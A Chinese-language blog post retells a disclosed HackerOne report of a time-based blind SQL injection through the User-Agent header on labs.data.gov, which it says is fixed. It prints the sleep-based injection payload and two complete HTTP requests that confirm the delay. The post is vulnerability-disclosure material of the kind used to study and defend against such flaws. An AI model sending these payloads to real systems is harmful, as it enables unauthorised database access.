HackerOne | HTTP頭注入之User-Agent注入

2019 年 12 月 15 日
筆記

漏洞資訊

發現者：harisec

漏洞種類：SQL注入

危害等級：嚴重

漏洞狀態：已修復

前言

Harisec在以下網站中發現一個SQL注入漏洞，注入的位置在User-Agent。

https://labs.data.gov/dashboard/datagov/csv_to_json

漏洞再現

Harisec使用了盲注的方式來確認該漏洞

例如：將User-Agent的值設置為

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'

將導致伺服器在25秒後響應

這裡，我們看一下具體的數據包內容

GET /dashboard/datagov/csv_to_json HTTP/1.1  Referer: 1  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'  X-Forwarded-For: 1  X-Requested-With: XMLHttpRequest  Host: labs.data.gov  Connection: Keep-alive  Accept-Encoding: gzip,deflate  Accept: */*

伺服器在25秒後響應，與User-Agent的值相同

將User-Agent的值改一下，改成9秒後響應

GET /dashboard/datagov/csv_to_json HTTP/1.1  Referer: 1  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(3*3),0))OR'  X-Forwarded-For: 1  X-Requested-With: XMLHttpRequest  Host: labs.data.gov  Connection: Keep-alive  Accept-Encoding: gzip,deflate  Accept: */*

漏洞影響

該漏洞可以使攻擊者注入惡意的SQL語句。

翻譯自hackerone

HackerOne | HTTP頭注入之User-Agent注入

VirMach 便宜 VPS

QNews

HackerOne | HTTP頭注入之User-Agent注入

分享此文：

Related Posts

使用Azure Application Insignhts監控ASP.NET Core應用程式

OPA-Gatekeeper實驗：對特定用戶的更新時間窗口做限制

flink sql使用中的一個問題

Frida框架在Fuzzing中的應用

VirMach 便宜 VPS

QNews

熱門搜尋